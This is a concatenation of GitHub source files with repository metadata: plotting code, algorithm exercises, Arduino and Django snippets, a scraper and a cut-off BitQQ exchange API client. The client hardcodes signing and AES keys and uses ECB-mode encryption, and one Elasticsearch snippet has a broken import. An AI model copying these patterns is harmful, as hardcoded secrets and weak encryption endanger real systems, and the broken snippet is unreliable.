+ x\n\n if fetch_range.start < 0:\n fetch_range.start = genome_range.start\n self._out_of_bound = 'left'\n\n try:\n arr = self.__fetch_matrix(fetch_range)\n except ValueError as e:\n if self._out_of_bound == 'left':\n self._out_of_bound = 'both'\n arr = self.__fetch_matrix(genome_range)\n else:\n self._out_of_bound = 'right'\n fetch_range.end = genome_range.end\n arr = self.__fetch_matrix(fetch_range)\n return arr, fetch_range\n\n def plot(self, ax, chrom_region, start_region, end_region):\n self.ax = ax\n\n self._out_of_bound = False\n\n log.debug(\"plotting {}\".format(self.properties['file']))\n\n genome_range = GenomeRange(chrom_region, start_region, end_region)\n\n self.ax = ax\n\n # fetch matrix and perform transform process\n if self.style == STYLE_WINDOW:\n arr, fetch_region = self.__fetch_window_matrix(genome_range)\n self.fetch_region = fetch_region\n else:\n arr = self.__fetch_matrix(genome_range)\n\n self.matrix = arr\n\n # plot matrix\n img = self.__plot_matrix(genome_range)\n self.__adjust_figure(genome_range)\n\n # plot colorbar\n if self.properties['color_bar'] == 'yes':\n if hasattr(self, 'y_ax') and self.style == STYLE_WINDOW:\n self.__plot_colorbar(img, orientation='vertical')\n else:\n self.__plot_colorbar(img, orientation='horizontal')\n else:\n pass\n\n # plot label\n self.plot_label()\n\n def get_track_height(self, frame_width):\n \"\"\"\n calculate track height dynamically.\n \"\"\"\n if self.style == STYLE_TRIANGULAR:\n height = frame_width * 0.5\n elif self.style == STYLE_WINDOW:\n if 'height' in self.properties and self.properties['height'] != 'hic_auto':\n height = self.properties['height']\n else:\n height = frame_width * 0.3\n else:\n height = frame_width * 0.8\n\n if 'depth_ratio' in self.properties and self.properties['depth_ratio'] != DEPTH_FULL:\n if self.properties['style'] != STYLE_MATRIX:\n height = height * self.properties['depth_ratio']\n\n if 'color_bar' in self.properties and self.properties['color_bar'] != 'no':\n height += 1.5\n\n return height\n","repo_name":"raivivek/CoolBox","sub_path":"coolbox/plots/track/hicmatrix.py","file_name":"hicmatrix.py","file_ext":"py","file_size_in_byte":12979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"38"} +{"seq_id":"12147505517","text":"class Node:\n def __init__(self, val):\n self.val = val\n self.next = None\n\n# O(min(n, m)) Time | O(1) Space\ndef merge_lists(head_1, head_2):\n new_head = Node(None)\n tail = new_head\n current_1 = head_1\n current_2 = head_2\n \n while current_1 is not None and current_2 is not None:\n if current_1.val < current_2.val:\n tail.next = current_1\n current_1 = current_1.next\n else:\n tail.next = current_2\n current_2 = current_2.next\n tail = tail.next\n if current_1 is not None: tail.next = current_1\n if current_2 is not None: tail.next = current_2\n \n return new_head.next","repo_name":"JeffersonGarcia15/Data-Structures-Algorithms","sub_path":"data_structures/merge_lists.py","file_name":"merge_lists.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"38"} +{"seq_id":"33078129205","text":"import pyfirmata\nfrom pyfirmata import Arduino, util\nimport time\nimport math\n\nboard = Arduino('COM3')\n\n#pin = board.get_pin('a:0:i') #analog pin 0 input\n\ncontrol = board.analog[1]\n\niterator = util.Iterator(board)\niterator.start()\ntime.sleep(0.1)\n\ntry:\n while True:\n control.enable_reporting()\n val = control.read()\n\n if(val == None):\n continue\n\n val = val*10\n\n if(val == 0):\n val = 1\n\n val = math.ceil(val)\n \n print(str(val))\n\n time.sleep(0.1)\n\nexcept KeyboardInterrupt:\n board.exit()\n","repo_name":"rdaw6/Dancing-Lights--Sr-Design","sub_path":"Indv Controls Tests/potentiometer_test.py","file_name":"potentiometer_test.py","file_ext":"py","file_size_in_byte":587,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"8229248895","text":"import unittest\nimport requests\nimport json\nimport sys\nsys.path.append(\"../..\") # 提升2级到项目根目录下\n\nfrom lib.read_excel import * # 从项目路径下导入\nfrom lib.case_log import log_case_info # 从项目路径下导入\n\n\nclass BaseCase(unittest.TestCase):\n @classmethod\n def setUpClass(cls):\n if cls.__name__ != 'BaseCase':\n cls.data_list = excel_to_list(data_file, cls.__name__)\n\n def get_case_data(self, case_name):\n return get_test_data(self.data_list, case_name)\n\n def send_request(self, case_data):\n case_name = case_data.get('case_name')\n url = case_data.get('url')\n args = case_data.get('args')\n expect_res = case_data.get('expect_res')\n method = case_data.get('method')\n data_type = case_data.get('data_type')\n\n if method.upper() == 'GET':\n res = requests.get(url=url, params=json.loads(args))\n\n elif data_type.upper() == 'FORM':\n res = requests.post(url=url, data=json.loads(args))\n log_case_info(case_name, url, args, expect_res, res.text)\n self.assertEqual(res.text, expect_res)\n else:\n res = requests.post(url=url, json=json.loads(args))\n log_case_info(case_name, url, args, json.dumps(json.loads(expect_res), sort_keys=True),\n json.dumps(res.json(), ensure_ascii=False, sort_keys=True))\n self.assertDictEqual(res.json(), json.loads(expect_res))\n\n\nif __name__ == \"__main__\":\n unittest.main()\n print(issubclass(BaseCase,BaseCase))","repo_name":"hanzhichao/api_test_framework","sub_path":"test/case/basecase.py","file_name":"basecase.py","file_ext":"py","file_size_in_byte":1570,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"38"} +{"seq_id":"42392983260","text":"import re\n\nfrom scrapy import FormRequest\nfrom scrapy.http import Response\n\nfrom StoreScraper.items import StoreItem\nfrom StoreScraper.spiders import base_spider\n\n\nclass PanasonicSpider(base_spider.BaseSpider):\n name = \"panasonicproclub.com\"\n\n def start_requests(self):\n post_data = {\n 'geo': '0',\n 'lat': '51.165691',\n 'lng': '10.451526',\n 'address': 'Deutschland',\n 'selected_list': '36',\n 'distance': '500',\n 'search': ''\n }\n yield FormRequest(url='https://www.panasonicproclub.com/ifinder/DE_de/home/', formdata=post_data)\n\n def parse(self, response: Response, **kwargs):\n values = re.findall(r'marcadores\\[(\\d+)]\\[(\\d+)]\\s*=\\s*\"(.*?)\";', response.text)\n results = dict()\n for row_index, column_index, value in values:\n if row_index not in results:\n results[row_index] = {\n 'Source': self.name\n }\n if column_index == '0':\n results[row_index]['Name1'] = value\n if column_index == '1':\n results[row_index]['Address'] = value\n if column_index == '99':\n results[row_index]['Zip'] = value\n if column_index == '100':\n results[row_index]['City'] = value\n if column_index == '3':\n results[row_index]['Phone'] = value\n if column_index == '4':\n results[row_index]['Email'] = value\n if column_index == '5':\n results[row_index]['Website'] = value\n if column_index == '6':\n results[row_index]['Latitude'] = value\n if column_index == '7':\n results[row_index]['Longitude'] = value\n for key, value in results.items():\n parsed_result = StoreItem(**value)\n yield self.add_unique_address_id(parsed_result)\n","repo_name":"ptsonev/StoreScraper","sub_path":"StoreScraper/spiders/panasonic_spider.py","file_name":"panasonic_spider.py","file_ext":"py","file_size_in_byte":1942,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"1034970260","text":"peso = 0\n\nmaior = 0\n\nmenor = 500\n\nfor c in range (1,6):\n\n peso = float(input('Qual o peso da {}º pessoa? (kg)'.format(c)))\n\n if peso>maior:\n\n maior = peso\n\n elif peso int:\n i = 0\n tempArea = 0\n arLength = len(height)\n for i in range(arLength):\n for j in range(i+1,arLength):\n if height[i] > height[j]:\n area = height[j] * (j-i)\n else:\n area = height[i] * (j-i)\n if area > tempArea:\n tempArea = area\n print(\"area:\"+str(area))\n print(\"temparea:\"+str(tempArea))\n \n return tempArea\n\n #viewed solution\n def maxArea(self,height: list[int]) -> int:\n left = 0\n right = len(height)-1\n area = 0\n while right > left:\n tarea = min(height[left], height[right]) * (right - left)\n\n if tarea > area:\n area = tarea\n \n if height[left] < height[right]:\n left = left + 1\n elif height[left] > height[right]:\n right = right - 1\n else:\n left = left + 1\n right = right - 1\n return area\n\nS1 = Solution()\nheight = [1,8,6,2,5,4,8,3,7]\nprint(S1.maxArea(height))\n\n\n\n","repo_name":"ocnow/CodeProblems","sub_path":"LeetCode/container-with-most-water.py","file_name":"container-with-most-water.py","file_ext":"py","file_size_in_byte":1218,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"36205162908","text":"'''\nProblem Description: \nFind the pairs comprising of two elements, inside an array.\n\nInput : array = [1,2,31,55,3,4,5,6,19] / target = 50\nOutput : [31,19]\n'''\n\nimport time\n\n\n## Method 1: Brute Force Aproach\ndef pairSumV1(nums,target):\n res = []\n for i in range(len(nums)):\n for j in range(i+1, len(nums)):\n if(nums[i],nums[j] == target):\n res.append([nums[i],nums[j]])\n return res\n\n\n## Method 2: Sorted Only, Implemented using general Double Pointer Approach\ndef pairSumV2(nums, target):\n res = []\n start, end = 0, len(nums)-1\n while(start < end):\n _sum = nums[start] + nums[end]\n if(_sum == target):\n res.append([nums[start], nums[end]])\n start += 1\n end -= 1\n elif(_sum > target):\n end -= 1\n elif(_sum < target):\n start += 1\n return res if res else []\n\n\n## Method 3: Pair Sum, Implemented on unsorted Array using Hashset;\ndef pairSumV3(nums, target):\n temp = {}\n res = []\n for (key,value) in enumerate(nums): # enumerate(nums) => key:value;\n needed = target-value\n if needed in temp:\n res.append([needed, value])\n else:\n temp[value]=key\n return res\n\ndef main():\n try:\n # res = pairSumV1(nums=[9,8,21,46,23,45,1,2,3,4,5], target=50) # Unsorted\n res1 = pairSumV2(nums=[1, 2, 3, 4, 5, 8, 9, 21, 23, 45, 46], target=50) # Sorted\n res2 = pairSumV3(nums=[9, 8, 21, 46, 23, 45, 1, 2, 3, 4, 5], target=50) # Unsorted\n print(res1) if res1 else print(\"Empty!\")\n print(res2) if res2 else print(\"Empty!\")\n \n except(Exception) as e:\n print(f\"Exception Traced : {e}\")\n \n else:\n print(\"Program Completed : Success\")\n\n finally:\n print(\"Program Terminated!\")\n\n \nif __name__ == '__main__':\n print(\"#------------ Code Start --------------#\")\n startTime = time.time()\n main()\n endTime = time.time()\n print(\"Run Time:\",endTime-startTime,\"ms\")\n print(\"#------------ Code Stop ----------------#\")\n ","repo_name":"neerajsinghjr/dsa","sub_path":"coding-minutes/01.Array/P001_Sort_array_Pair_Sum.py","file_name":"P001_Sort_array_Pair_Sum.py","file_ext":"py","file_size_in_byte":2132,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"12238736870","text":"import numpy as np\n\n# this script will solve a system of linear equations\n# to determine the optimal angular offsets to align Pmx\n\n#dPmx = E'*cos(theta_e)*dtheta_e - pf*cos(theta_p)dtheta_p\n#dPmz = E'*sin(theta_e)*dtheta_e + pf*sin(theta_p)dtheta_p\n\n\na_00 = 3. # Ef * np.cos(theta_e)\na_01 = 2 #-pf * np.cos(theta_p)\na_10 = 0 # Ef * np.sin(theta_e)\na_11 = 6 # pf * np.sin(theta_p)\n\n\nA = np.array([[a_00, a_01], \n [a_10, a_11]])\n\nA_inv = np.linalg.inv(A)\n\n#dth = [ dtheta_e, dtheta_p ]\n#dPm = [ dPmx, dPmz ]\n\n\nresult = A_inv.dot(x)\nprint('result=',result)\n\n","repo_name":"Yero1990/cafe_offline_replay","sub_path":"post_analysis/special_studies/heep_check/calculate_offsets.py","file_name":"calculate_offsets.py","file_ext":"py","file_size_in_byte":568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"14169788407","text":"import random\nsecret =random.randint(1,10)\ntimes = 3\nguess = 0\nprint(\"来,猜猜哥现在心里想的数字是几.\", end=\"\")\nwhile (guess != secret) and (times > 0):\n temp = input('请在此处输入')\n guess = int(temp)\n times = times - 1\n if guess == secret:\n print('恭喜你,答对了!')\n print('哼,答对也没有奖励哦')\n else:\n if guess > secret:\n print('大了大了')\n else:\n print('小了小了')\n if times > 0:\n print('再来一次,')\n else:\n print('对不起,机会用完喽')\nprint(\"游戏结束,谢谢参与!\")\n","repo_name":"unclelaozhang/Python_fishc","sub_path":"改进小游戏独立完成.py","file_name":"改进小游戏独立完成.py","file_ext":"py","file_size_in_byte":644,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"72450674669","text":"notas = input()\nnota1 = ''\nvar = True\n\nwhile var:\n for v in notas:\n if v.isdigit() or v == '.':\n nota1 += v\n else:\n var = False\n break\n\nnota2 = ''.join(x for x in notas if x not in nota1)\n\nif nota2 == ' ':\n nota2 += notas[0]\n nota2 += notas[1]\n\nmedia = (float(nota1) + float(nota2)) / 2\n\nif media >= 7:\n print('Aprovado')\n\nelif media >= 4:\n print('Recuperacao')\n\nelse:\n print('Reprovado')","repo_name":"gabrielbelo2007/Activities","sub_path":"Activities (NEPS)/Aprovado ou Reprovado.py","file_name":"Aprovado ou Reprovado.py","file_ext":"py","file_size_in_byte":453,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"44348204317","text":"import tkinter as tk\r\nfrom tkinter import simpledialog\r\n\r\ndef main():\r\n root = tk.Tk()\r\n root.withdraw()\r\n value = simpledialog.askstring(\"Entrada\", \"Ingresa un valor:\")\r\n root = tk.Tk()\r\n root.withdraw()\r\n value = simpledialog.askstring(\"Entrada\", \"Ingresa un valor:\")\r\n if value is not None:\r\n print(\"Valor ingresado:\", value)\r\n else:\r\n print(\"Ningún valor ingresado.\")\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"CaDelTo/Cado-Project","sub_path":"ConsolaTryOut.py","file_name":"ConsolaTryOut.py","file_ext":"py","file_size_in_byte":454,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"26917068943","text":"# pylint: disable=missing-module-docstring\n# pylint: disable=missing-class-docstring\n# pylint: disable=missing-function-docstring\n\nfrom django.http import HttpResponseServerError\nfrom rest_framework.viewsets import ViewSet\nfrom rest_framework.response import Response\nfrom rest_framework import serializers, status\nfrom rest_framework import generics\nfrom hangrymealsapi.models import RecipeIngredients, Recipe, Ingredient\n\n\n\nclass RecipeIngredientsSerializer(serializers.ModelSerializer):\n class Meta:\n model = RecipeIngredients\n fields = ('id', 'recipe', 'ingredient')\n depth = 2\n\n\nclass RecipeIngredientsView(ViewSet):\n\n def retrieve(self, request, pk):\n recipeingredients = RecipeIngredients.objects.get(pk=pk)\n serializer = RecipeIngredientsSerializer(recipeingredients)\n return Response(serializer.data)\n\n def list(self, request):\n recipeingredients = RecipeIngredients.objects.all()\n recipe = request.query_params.get('recipe', None)\n if recipe is not None:\n recipe = recipeingredients.filter(recipe=recipe.id)\n ingredient = request.query_params.get('ingredient', None)\n if ingredient is not None:\n ingredient = recipeingredients.filter(ingredient=ingredient.id)\n serializer = RecipeIngredientsSerializer(recipeingredients, many=True)\n return Response(serializer.data)\n\n def create(self, request):\n recipe = Recipe.objects.get(pk=request.data[\"recipe\"])\n ingredient = Ingredient.objects.get(pk=request.data[\"ingredient\"])\n recipeingredients = RecipeIngredients.objects.create(\n recipe=recipe,\n ingredient=ingredient,\n )\n serializer = RecipeIngredientsSerializer(recipeingredients)\n return Response(serializer.data)\n\n def update(self, request, pk):\n recipeingredients = RecipeIngredients.objects.get(pk=pk)\n recipe = Recipe.objects.get(pk=request.data[\"recipe\"])\n ingredient = Ingredient.objects.get(pk=request.data[\"ingredient\"])\n recipeingredients.recipe = recipe\n recipeingredients.ingredient = ingredient\n recipeingredients.save()\n\n return Response(None, status=status.HTTP_204_NO_CONTENT)\n\n def destroy(self, request, pk):\n recipeingredients = RecipeIngredients.objects.get(pk=pk)\n recipeingredients.delete()\n return Response(None, status=status.HTTP_204_NO_CONTENT)\nclass ByRecipeIngredientsView(generics.ListCreateAPIView):\n serializer_class = RecipeIngredientsSerializer\n\n def get_queryset(self):\n recipe_id = self.kwargs['recipe_id']\n return RecipeIngredients.objects.filter(recipe__id=recipe_id)\n","repo_name":"shalane-proctor/hangry-meals-server","sub_path":"hangrymealsapi/views/recipeingredients.py","file_name":"recipeingredients.py","file_ext":"py","file_size_in_byte":2697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"41259498056","text":"class Solution:\n def plusOne(self, digits: 'List[int]') -> 'List[int]':\n i = len(digits)-1\n cnt = 1\n while i >= 0:\n if digits[i]+cnt >= 10:\n digits[i], cnt = 0, 1\n i -= 1\n else:\n digits[i] += cnt\n return digits\n if cnt != 0:\n return [1]+digits\n else:\n return digits\n\n\nif __name__ == \"__main__\":\n print(\n Solution().plusOne(\n [0]\n )\n )","repo_name":"kimroniny/ACM","sub_path":"LeetCode/0066/66.py","file_name":"66.py","file_ext":"py","file_size_in_byte":507,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"28531364937","text":"'''\nThis file uses the class `TechnicalIndicatorOptimizer`\nthat I created to optimize the technical indicators\nand build a dashboard to compare the results of the different indicators\nThis is a very slow process and will take a long time to run.\nI'm sure there is a LOT of room for improvement here.\n'''\n\nfrom ta_optimizer import TechnicalIndicatorOptimizer\nimport logging\nimport os\nimport pandas_ta as ta\nimport pandas as pd\n\n# Configure logging\nlogging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')\n\n# Load data into a Pandas DataFrame\ndf = pd.read_csv('data/btc.csv', parse_dates=True, index_col=0)\nmodel_store = 'models/'\nos.makedirs(model_store, exist_ok=True) # create the models directory if it doesn't exist\n\n\n# SMA\nlogging.info(\"Optimizing SMA\")\nsma_optimizer = TechnicalIndicatorOptimizer(\n df, \n ta.sma, \n \"sma\", \n \"length\", \n [5, 10, 20, 50, 100], \n [5, 30, 60, 90, 120]\n)\nsma_best_result = sma_optimizer.optimize()\nprint(\"SMA Best Result:\", sma_best_result)\n\n# EMA\nlogging.info(\"Optimizing EMA\")\nema_optimizer = TechnicalIndicatorOptimizer(\n df, \n ta.ema, \n \"ema\", \n \"length\", \n [5, 10, 20, 50, 100], \n [5, 30, 60, 90, 120]\n)\nema_best_result = ema_optimizer.optimize()\nprint(\"EMA Best Result:\", ema_best_result)\n\n# Stochastic\nlogging.info(\"Optimizing Stochastic\")\nstoch_optimizer = TechnicalIndicatorOptimizer(\n df,\n None,\n \"stoch\",\n [\"k_period\", \"d_period\"],\n [(5, 3), (14, 3), (14, 5)],\n [5, 30, 60, 90, 120],\n indicator_type='stochastic'\n)\nstoch_best_result = stoch_optimizer.optimize()\nprint(\"Stochastic Best Result:\", stoch_best_result)\n\n# Plot the analysis results for the two different moving average indicators\nsma_results = [sma_optimizer.evaluate_indicator_param(param_value) for param_value in sma_optimizer.param_values]\nema_results = [ema_optimizer.evaluate_indicator_param(param_value) for param_value in ema_optimizer.param_values]\n# Generate the analysis results for the different Stochastic parameter values\nstoch_results = [stoch_optimizer.evaluate_indicator_param(param_value) for param_value in stoch_optimizer.param_values]\n\n\nlogging.info(\"Plotting SMA Analysis Dashboard\")\nsma_optimizer.plot_analysis_dashboard(\n sma_results, title='SMA Optimization Dashboard')\nlogging.info(\"Plotting EMA Analysis Dashboard\")\nema_optimizer.plot_analysis_dashboard(\n ema_results, title='EMA Optimization Dashboard')\nlogging.info(\"Plotting Stochastic Analysis Dashboard\")\nstoch_optimizer.plot_analysis_dashboard(\n stoch_results, title='Stochastic Optimization Dashboard')\n","repo_name":"eervin123/feature-engineering","sub_path":"random-forest/run_optimizer.py","file_name":"run_optimizer.py","file_ext":"py","file_size_in_byte":2593,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"38"} +{"seq_id":"21789904665","text":"import datetime\nfrom database.models import Module, MetaData, Student\nfrom database.views import is_admin\nfrom django.contrib.auth.models import Group\nfrom django.template import Context, RequestContext\nfrom database.views import is_teacher, is_student, is_admin\n\n\ndef menubar(request):\n admin = False\n inactive = False\n alumni = False\n unassigned = False\n user_is_student = False\n if is_teacher(request.user) or is_admin(request.user):\n future = []\n past = []\n current = []\n meta = MetaData.objects.get(data_id=1)\n current_year = meta.current_year\n all_modules = Module.objects.all()\n for module in all_modules:\n if (request.user in module.instructors.all() or\n is_admin(request.user)):\n if module.year == current_year:\n current.append(module)\n elif module.year > current_year:\n future.append(module)\n elif module.year < current_year:\n past.append(module)\n current.sort(key=lambda x: x.title)\n future.sort(key=lambda x: x.title)\n past.sort(key=lambda x: x.title)\n if is_admin(request.user):\n admin = True\n# admins = Group.objects.get(name=\"admins\").user_set.all()\n# if request.user in admins:\n# admin = True\n# else:\n# admin = False\n inactive_students = Student.objects.filter(active=False)\n if len(inactive_students) > 0:\n if admin:\n inactive = True\n alumni_students = Student.objects.filter(year=9)\n if len(alumni_students) > 0:\n alumni = True\n not_assigned = Student.objects.filter(year=None)\n if len(not_assigned) > 0:\n unassigned = True\n module_dict = {'current': current, 'past': past, 'future': future}\n else: # Student View\n module_dict = {}\n user_is_student = True\n return {\n 'module_dict': module_dict,\n 'admin': admin,\n 'inactive': inactive,\n 'alumni': alumni,\n 'unassigned': unassigned,\n 'user_is_student': user_is_student\n }\n","repo_name":"tobi2006/mysds","sub_path":"database/context_processors.py","file_name":"context_processors.py","file_ext":"py","file_size_in_byte":2186,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"27808776978","text":"from elasticsearch import E\n\nes=Elasticsearch()\n# 添加数据\nes.index(index=\"my_index\",doc_type=\"test_type\",id=1,body={\"name\":\"python\",\"addr\":\"深圳\"})\n# 查询数据\nresult = es.search(index=\"my_index\",doc_type=\"test_type\")\n# 打印所有数据\nfor item in result[\"hits\"][\"hits\"]:\n print(item[\"_source\"])\n","repo_name":"hua1054921935/TeacherManager","sub_path":"elasticsearch.py","file_name":"elasticsearch.py","file_ext":"py","file_size_in_byte":312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"72122179950","text":"# encoding: utf-8\nimport json\nimport time\nimport hmac\nimport copy\nimport binascii\nimport asyncio\nfrom urllib.parse import urljoin, quote\nimport hashlib\n\nfrom quant import const\nfrom quant.error import Error\nfrom quant.utils import logger\nfrom quant.const import BITQQ\nfrom quant.order import Order\nfrom quant.tasks import SingleTask, LoopRunTask\nfrom quant.asset import Asset, AssetSubscribe\nfrom quant.utils.http_client import AsyncHttpRequests\nfrom quant.order import ORDER_ACTION_BUY, ORDER_ACTION_SELL\nfrom quant.order import ORDER_TYPE_LIMIT, ORDER_TYPE_MARKET\nfrom quant.order import ORDER_STATUS_SUBMITTED, ORDER_STATUS_PARTIAL_FILLED, ORDER_STATUS_FILLED, \\\n ORDER_STATUS_CANCELED, ORDER_STATUS_FAILED, ORDER_STATUS_PENDING_CANCEL\nfrom base64 import b64encode\nfrom Crypto.Cipher import AES\n\n__all__ = (\"BitQQRestAPI\", \"BitQQTrade\")\n\n\ndef convert_md5(origin):\n result = []\n s = \"\"\n for i in range(len(origin)):\n s += origin[i]\n if i % 2 != 0:\n int_hex = int(s, 16)\n result.append(int_hex)\n s = \"\"\n\n return result\n\n\ndef encryption_md5_buy_key(data):\n key = 'T5xJUNDA6hzxBuuwx8arhsDxCNGbO7iL'\n encode_data1 = data.encode()\n result1 = hmac.new(key.encode(), encode_data1, digestmod='MD5').hexdigest()\n last_result = convert_md5(result1)\n l_result = bytearray(last_result)\n lll_result = b64encode(l_result)\n return lll_result.decode()\n\n\nclass AESCipher:\n \"\"\"AES ECB 128位加密\"\"\"\n\n def __init__(self, key, BLOCK_SIZE):\n self.key = key\n self.BLOCK_SIZE = BLOCK_SIZE\n\n def pad(self, s):\n return s + (self.BLOCK_SIZE - len(s) % self.BLOCK_SIZE) * chr(self.BLOCK_SIZE - len(s) % self.BLOCK_SIZE)\n\n def unpad(self, s):\n return s[:-ord(s[len(s) - 1:])]\n\n def encrypt(self, raw):\n raw = self.pad(raw)\n cipher = AES.new(self.key, AES.MODE_ECB)\n ret = cipher.encrypt(raw.encode()) # 加密pwd原文得到秘文pwd\n return ret.hex() # 将秘文转换为16进制\n\n def decrypt(self, enc):\n enc = binascii.unhexlify(enc)\n cipher = AES.new(self.key, AES.MODE_ECB)\n return self.unpad(cipher.decrypt(enc)).decode('utf8')\n\n\nclass BitQQRestAPI:\n\n def __init__(self, host, access_key, secret_key, passphrase, order_module_host=None):\n \"\"\"因暂时未开放api,则access代表账号, secret代表密码\"\"\"\n self._host = host\n self._order_module_host = order_module_host\n self._access_key = access_key\n self.secret_key = secret_key\n self.passphrase = passphrase # 账号id\n # self.token = None\n # SingleTask.run(self.login)\n # LoopRunTask.register(self.login, interval=60 * 60)\n\n async def get_spot_accounts(self):\n uri = 'api/userfund/list'\n success, error = await self.request('GET', uri, auth=True)\n # print(success, error)\n return success, error\n\n # async def login(self, *args, **kwargs):\n # t = int(time.time() * 1000)\n # key = \"mN4Yn8Or8r7SH1w4VnpS5lMS\"\n # BLOCK_SIZE = 16 # Bytes\n # md = hashlib.md5()\n # md.update(key.encode())\n #\n # ret = md.hexdigest() # 将密钥进行md5加密并获取加密后的密文\n # ret_16bit = convert_md5(ret) # 将密文转换为16位的数组\n # bytess = bytearray(ret_16bit) # 将数组转换为bytearray\n #\n # aes = AESCipher(bytess, BLOCK_SIZE)\n # en = aes.encrypt(self.secret_key) # 加密pwd\n # ss = self.secret_key + str(t) + en\n # sign = encryption_md5_buy_key(ss) # 生成签名\n #\n # uri = 'api/user/login'\n #\n # sign = sign.replace('+', '%2B')\n #\n # params = {\n # 'userAccount': self._access_key,\n # 'password': en,\n # 'device': 'oNrTBq4u3gP9G0ns2SoKypG9X',\n # 'loginTime': t,\n # 'sign': sign,\n # 'type': 2\n # }\n # while True:\n # success, error = await self.request('POST', uri, params=params, auth=False)\n # if success:\n # if success['state'] == 0:\n # self.token = success['token']\n # logger.info('登录成功', self.token)\n # else:\n # self.token = None\n # else:\n # self.token = None\n # logger.error('登录失败', error)\n # if self.token:\n # break\n # asyncio.sleep(2)\n\n async def create_order(self, action, symbol, price, quantity, *args):\n \"\"\"\n\n :param action:\n :param symbol: 交易对符号 例 eos_usdt\n :param price: 价格,float\n :param quantity: 交易量 float\n :param order_type:\n :param account_type: 1、币币 2、杠杆\n :return:\n \"\"\"\n uri = 'coin/entrust/robot/order'\n is_order_module = False\n if self._order_module_host:\n uri = 'entrust/robot/order'\n is_order_module = True\n params = {\n 'type': \"buy\" if action == ORDER_ACTION_BUY else \"sell\",\n 'amount': quantity,\n 'price': price,\n 'symbol': symbol,\n }\n\n success, error = await self.request('POST', uri=uri, params=params, auth=True, is_order_module=is_order_module)\n\n return success, error\n\n async def revoke_order(self, order_no):\n uri = 'coin/entrust/revoke'\n is_order_module = False\n if self._order_module_host:\n uri = 'entrust/revoke'\n is_order_module = True\n\n params = {\n 'orderId': order_no\n }\n success, error = await self.request('POST', uri=uri, params=params, auth=True, is_order_module=is_order_module)\n\n return success, error\n\n async def revoke_orders(self, *order_ids):\n uri = 'coin/entrust/robot/batchOrder'\n is_order_module = False\n if self._order_module_host:\n uri = 'entrust/robot/batchOrder'\n is_order_module = True\n\n order_ids_str = [str(id) for id in order_ids]\n if len(order_ids_str) > 12:\n order_ids_str = order_ids_str[:12]\n params = {\n 'orderIds': ','.join(order_ids_str)\n }\n\n success, error = await self.request('POST', uri=uri, params=params, auth=True, is_order_module=is_order_module)\n\n return success, error\n\n async def get_user_account(self):\n url = 'api/userfund/list'\n success, error = await self.request('GET', uri=url, auth=True)\n return success, error\n\n async def get_order_info(self, order_no):\n uri = 'coin/user/robot/orderDetail'\n is_order_module = False\n if self._order_module_host:\n uri = 'user/robot/orderDetail'\n is_order_module = True\n params = {\n 'orderId': order_no\n }\n success, error = await self.request('POST', uri=uri, params=params, auth=True, is_order_module=is_order_module)\n\n return success, error\n\n async def get_order_list(self, symbol):\n uri = 'coin/user/robot/currOrderList'\n is_order_module = False\n if self._order_module_host:\n uri = 'user/robot/currOrderList'\n is_order_module = True\n params = {\n 'symbol': symbol,\n 'module': 1,\n 'page': 0,\n 'limit': 999\n }\n success, error = await self.request('POST', uri=uri, params=params, auth=True, is_order_module=is_order_module)\n return success, error\n\n async def get_kline(self, symbol, kline_type=const.MARKET_TYPE_KLINE, start=None, limit=20):\n uri = 'public/market/kline'\n params = {\n 'symbol': symbol,\n 'page': 1,\n 'limit': limit\n }\n if kline_type == const.MARKET_TYPE_KLINE:\n params['timeType'] = 1\n elif kline_type == const.MARKET_TYPE_KLINE_5M:\n params['timeType'] = 2\n elif kline_type == const.MARKET_TYPE_KLINE_15M:\n params['timeType'] = 3\n elif kline_type == const.MARKET_TYPE_KLINE_30M:\n params['timeType'] = 4\n elif kline_type == const.MARKET_TYPE_KLINE_1H:\n params['timeType'] = 5\n elif kline_type == const.MARKET_TYPE_KLINE_24H:\n params['timeType'] = 6\n\n success, error = await self.request('POST', uri=uri, params=params)\n if success:\n kline_list = list()\n klines = success['data']['list']\n for kline in klines:\n ts_str = kline['createDate']\n ts = int(time.mktime(time.strptime(ts_str, '%Y-%m-%d %H:%M:%S'))) * 1000\n kline['createDate'] = ts\n if ts >= start:\n kline_list.append(kline)\n if len(kline_list) > limit:\n return kline_list[0:limit], None\n else:\n return kline_list\n else:\n return success, error\n\n async def get_latest_price(self, symbol):\n \"\"\"获取最新成交价\"\"\"\n uri = '/public/market/lastOrder'\n params = {\n 'symbol': symbol,\n 'limit': 1\n }\n\n success, error = await self.request('POST', uri=uri, params=params)\n return success, error\n\n async def request(self, method, uri, params=None, body=None, auth=False, is_order_module=False):\n \"\"\" 发起请求\n @param method 请求方法 GET / POST / DELETE / PUT\n @param uri 请求uri\n @param params dict 请求query参数\n @param body dict 请求body数据\n @param headers 请求http头\n @param auth boolean 是否需要加入权限校验\n @:return: 请求成功success为返回数据,error为None,请求失败,success为None,error为报错信息\n \"\"\"\n # 